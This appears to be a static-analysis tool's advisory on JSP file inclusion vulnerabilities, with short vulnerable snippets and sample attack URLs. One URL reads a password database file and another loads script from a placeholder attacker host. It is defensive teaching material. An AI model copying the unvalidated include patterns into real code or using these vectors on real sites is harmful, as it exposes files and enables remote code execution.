ABSTRACT

Allowing unvalidated user input to control files that are included dynamically in a JSP can lead to malicious code execution.

EXPLANATION

Many modern web scripting languages enable code re-use and modularization through the ability to include additional source files within one encapsulating file. This ability is often used to apply a standard look and feel to an application (templating), share functions without the need for compiled code, or break the code into smaller more manageable files. Included files are interpreted as part of the parent file and executed in the same manner. File inclusion vulnerabilities occur when the path of the included file is controlled by unvalidated user input.

Example 1: The following is an example of Local File Inclusion vulnerability. The sample code takes a user specified template name and includes it in the JSP page to be rendered.


...
<jsp:include page="<%= (String)request.getParameter(\"template\")%>">
...

If the attacker specifies a valid file to the dynamic include statement, the contents of that file will be passed to the JSP interpreter to be rendered on the page.

In the case of an attack vector of the form

specialpage.jsp?template=/WEB-INF/database/passwordDB

the JSP interpreter will render the contents of the /WEB-INF/database/passwordDB file to the JSP page thus compromising the security of the system.

Worse, if the attacker can specify a path to a remote site controlled by the attacker, then the dynamic include statement will execute arbitrary malicious code supplied by the attacker.

Example 2: An example of Remote File Inclusion vulnerability is shown below. The sample code uses the c:import tag to import a user specified remote file into the current JSP page.

...
<c:import url="<%= request.getParameter("privacy")%>">
...

An attack vector of the form

policy.jsp?privacy=http://www.malicioushost.com/attackdata.js

can inject malicious code into the current JSP page from a remote site controlled by the attacker.

REFERENCES

[1] Standards Mapping - OWASP Top 10 2010 - (OWASP 2010) A1 Injection

[2] Standards Mapping - OWASP Top 10 2004 - (OWASP 2004) A1 Unvalidated Input

[3] Standards Mapping - OWASP Top 10 2007 - (OWASP 2007) A3 Malicious File Execution

[4] Standards Mapping - Security Technical Implementation Guide Version 3 - (STIG 3) APP3510 CAT I, APP3600 CAT II

[5] Standards Mapping - Common Weakness Enumeration - (CWE) CWE ID 94, CWE ID 98

[6] Standards Mapping - Payment Card Industry Data Security Standard Version 1.2 - (PCI 1.2) Requirement 6.3.1.1, Requirement 6.5.3

[7] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 - (PCI 1.1) Requirement 6.5.1

[8] Standards Mapping - Payment Card Industry Data Security Standard Version 2.0 - (PCI 2.0) Requirement 6.5.8

[9] Standards Mapping - SANS Top 25 2009 - (SANS 2009) Risky Resource Management - CWE ID 094

[10] Standards Mapping - SANS Top 25 2010 - (SANS 2010) Risky Resource Management - CWE ID 098

[11] Standards Mapping - FIPS200 - (FISMA) SI